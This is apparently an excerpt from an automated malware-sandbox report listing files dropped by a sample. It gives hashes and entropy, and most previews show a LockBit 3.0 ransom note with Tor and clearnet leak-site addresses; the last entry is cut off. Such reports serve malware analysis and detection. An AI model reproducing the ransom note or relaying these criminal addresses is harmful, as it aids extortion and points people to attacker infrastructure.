                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.976061252151808
                Encrypted:false
                SSDEEP:192:YHnan0wddTGqTq5PGfTVHgoL4UyPFG62nk92fFh1CBo:Y6nzLpTIcLpyghnk0fFvCK
                MD5:52FB5499D1963B6780467CE6B05992C4
                SHA1:37B3B259E784436358A2EC4BE1A3C62F0664EAB1
                SHA-256:21BEA54B8340CAFE55262482CAD1FECCEC93DE01E1B13E504EF9B3486C5A4157
                SHA-512:E4E5FD41C668FAA55010C20A7A2CE4A4D9AC970A42B7A3FF3968B3A3295E12763194C07D66D4DE59E1DC85F982DBBE3F1823DDFD7256EF58B90CEFAF443D3383
                Malicious:false
                Preview:..7c;9.s.....x[.2+.J...g...|.k....sZvS...uFV.r.].vT.r.H..i6."u..Z.J....j.+..Y. ...,9S..$rZF..EoE6v....4sg.t......;T.7.. T#...W:...S......z.W.n@".......aM....w.y~.[.J&zy.B'.&......I.J......a..P.R9%.i.......aoo.G.iX...D.q..z..-/]...\.I.2S;.x.........i...u........6L$C..9...g...uO.p._._...l..h.f%.w.S1.....J.> ^"~,.......!........U.s...(.9@.hr.c....E<S.g..2...#...%X.!o..B..O......Q...).c ..h...*.....".....V.:)."."...yx..U./..b.1..R l..>rc.".**P>.......@wBX..^3...g..PK...9sE...6..;J...)..b..+..{.&..F...+.....Ct.p..>&gA=b....^.2.....k......JK.T....0x....a.x$i...OOz..%.v<.I'......M...fA..)....y.4.A.*6.TrO.0.URv..L.8.......;b.=ZR..A[.%......)70.k..(..n7q.s.......=.@.TS....*F<#Cn...........f...I...)...Q...z.\......<..y....k.......G3......I...'....%Wh4..A..........y....o..<L.E9SIl..........q.I.Zu`Z2k..S.....f......Y.K..;+...!L_.A.x.........%.h}...vV.E}.......s8....f....o.fZ.>.... K.h.7A.....,..s/.kt...fj..-...pZ?...w.{8pT..#X...,..c_i...ZW/.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9767427308569925
                Encrypted:false
                SSDEEP:192:xapAqAnl1OTljmVQn9etpD3Ba5XiUZjAGZTcotyNx2zCqxNl1LY4VQOo:xa6qAlYwCqp9SZBZyXUCqxdaX
                MD5:8392FE3D4E4981FABE8BC213E9AF63E6
                SHA1:691B677ED88559F5940C6CF93AEC6FF9B44F2ED1
                SHA-256:D7AFB01440690503502C704B96AF7EC6D5F56C08AC72D7121E67E3099E30AE2D
                SHA-512:7A7C2FDC33FD90CDB40681FBBAF0742DB37EDD0093FF3D9A5F7882E8A950C7ED538B1D8192F0089547ACC41069394052774890E9F55B8E2C41F3E75659CE117A
                Malicious:false
                Preview:...Dp..c......o..SSa".\4.QT]G..^..F.mbb.H..ez..8.......~.t...&.....*f....;..T=*...d.%#...@w..5owc",..0K...;I..Y....;}...&...F8F.=..M....?....mI..{..0...t.......Z..Y5.uN...L..L......(W.a.L...+j..#$...@....-....Rv.X.]apk....tV.~Nh.Cy^..<K.U....E]...9.'`r..J....[.t...E.Mf.....=.4..p9&~u%.k...Sm....1<..'.Z!9.qT.$....PrO....^.....D.../VH".3V....... ......J4D;PqJ.jhUH.a..?..#6l..q.=-.S..; W.0.....\o......|.....6.SF....P.m.F... .K..%.+..a..t.:o..Rq>....L...U..E.#.^..=....d..bB..'$d.....*ys<3.* .].|....g...h.......=...=.....J..SY.@3k.@..r..+...m2.<..\.&.......++L...d;..G#f.D.d..r,..L}-....{.....S..zi!..$ZnQ......+.._.,....+V.....@....f.@..C... .=.P...C,..[*-"<.G3_f....._."t.h......W..:@.g.....C..L.l..oOPkh.|.......ko.....8..Clq.>....76..k..+..=.........x.....-O(...*Ov..6..`...4.\..B..`.>X..s.!..a...v&..#.+..8.e.-...,K.....l...x.....%pzf..b...h...^......,sP..z....B'?Y1...{d.{....-...(..i.t...]OPqc.8.E..a~........D...4l#S.".......Y.._.....

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 